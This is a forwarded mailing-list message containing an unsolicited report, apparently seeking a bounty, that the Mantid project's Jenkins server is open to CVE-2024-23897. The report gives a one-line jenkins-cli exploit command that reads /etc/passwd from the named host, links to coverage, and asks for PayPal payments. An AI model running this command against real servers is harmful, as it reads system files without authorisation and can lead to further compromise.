[Mantid-devops] FW: [Mantid-help] CVE-2024-23897 - builds.mantidproject.org- Jenkins Arbitrary file read vulnerability‏‏‏‏

Forwarding onto Mantid DevOps. Could be spam but best to double check. From: דוד בוזגלו via Mantid-help &lt;mantid-help(a)mantidproject.org&gt; Sent: 27 January 2024 14:28 To: Mantid Help &lt;mantid-help(a)mantidproject.org&gt; Subject: [Mantid-help] CVE-2024-23897 - builds.mantidproject.org- Jenkins Arbitrary file read vulnerability‏‏‏‏ Hello, My name is David and I am a security researcher. Jenkins CVE-2024-23897 Arbitrary file read vulnerability through the CLI can lead to RCE Url :https://<https://www.gpuci.io/>builds.mantidproject.org<http://builds.mantidproject.org> java -jar ./jenkins-cli.jar -s https://builds.mantidproject.org/ connect-node "@/etc/passwd" [image.png] read more : https://securityonline.info/cve-2024-23897-cvss-9-8-critical-jenkins-securi… https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.ht… https://github.com/jenkinsci/jenkins/commit/554f03782057c499c49bbb06575f0d2… Liked my Bug ? Buy me a coffee (or more likely a Beer X2) https://www.paypal.com/paypalme/bugbounty1/150USD <https://www.paypal.com/paypalme/bugbounty1/150USD> https://www.paypal.com/paypalme/bugbounty1/75USD <https://www.paypal.com/paypalme/bugbounty1/75USD> https://www.buymeacoffee.com/bugbounty <https://www.buymeacoffee.com/bugbounty> Help me to continue to protect others Information .